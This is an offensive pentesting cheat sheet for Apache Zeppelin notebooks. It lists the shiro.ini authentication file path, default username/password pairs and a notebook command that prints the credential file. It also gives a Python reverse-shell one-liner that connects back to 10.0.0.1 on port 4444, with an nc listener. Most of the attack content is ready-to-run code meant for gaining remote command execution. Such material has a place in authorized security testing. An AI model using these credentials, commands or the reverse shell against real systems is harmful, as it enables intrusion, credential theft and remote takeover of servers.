# Apache Zeppelin Pentesting

Apache Zeppelin is a web-based notebook that enables data-driven. It uses 8080 port by default.

### Authentication Config File <a href="#authentication-config-file" id="authentication-config-file"></a>

```shellscript
/shiro.ini
```

### Default Credentials <a href="#default-credentials" id="default-credentials"></a>

```shellscript
admin:admin
admin:password1
user1:password2
user1:role1
user1:role2
user2:password3
user2:role3
user3:password4
user3:role2
```

### RCE in Notebooks <a href="#rce-in-notebooks" id="rce-in-notebooks"></a>

We can execute remote OS command in notebooks. Access to the notebook and execute the following scripts.

```shellscript
%python

import os

# Configurations
os.system('cat conf/shiro.ini')
```

#### Reverse Shell <a href="#reverse-shell" id="reverse-shell"></a>

Before executing the following script, we need to start a listener such as **`nc -lvnp 4444`** in local machine.

```shellscript
%python

import os,pty,socket;s=socket.socket();s.connect(("10.0.0.1", 4444));[os.dup2(s.fileno(),fd) for fd in (0,1,2)];pty.spawn("bash")
```

### References <a href="#references" id="references"></a>

* [Apache Zeppelin Docs](https://zeppelin.apache.org/docs/0.8.0/setup/security/shiro_authentication.html)